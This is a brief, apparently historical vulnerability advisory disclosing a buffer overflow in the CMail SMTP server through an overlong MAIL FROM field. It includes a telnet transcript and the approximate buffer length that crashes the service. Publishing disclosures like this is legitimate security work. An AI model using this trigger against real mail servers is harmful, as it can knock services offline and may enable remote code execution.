We found a buffer overflow in the CMail SMTP service
(long MAIL FROM:) that may
allow an attacker to execute arbitrary code on
the target server, it is based on the eEye
pointed out overflows in cmail 2.3 >:-] Which was
never fixed... software vendors still
not taking security issues seriously.
[cham@guilt cham]$ telnet example.com 25
Connected to example.com.
Escape character is '^]'.
220 SMTP services ready. Computalynx CMail Server
250 Hello ussr [yourip], how are you today?
MAIL FROM: cmail <[buffer]@cmaildotcom.com>
Where [buffer] is aprox. 7090 characters.
At his point the server overflows and crashes.
Just a typical buffer overflow that should
have been fixed in version 2.3 when it was pointed
out to them.
u n d e r g r o u n d s e c u r i t y s y s t e
m s r e s e a r c h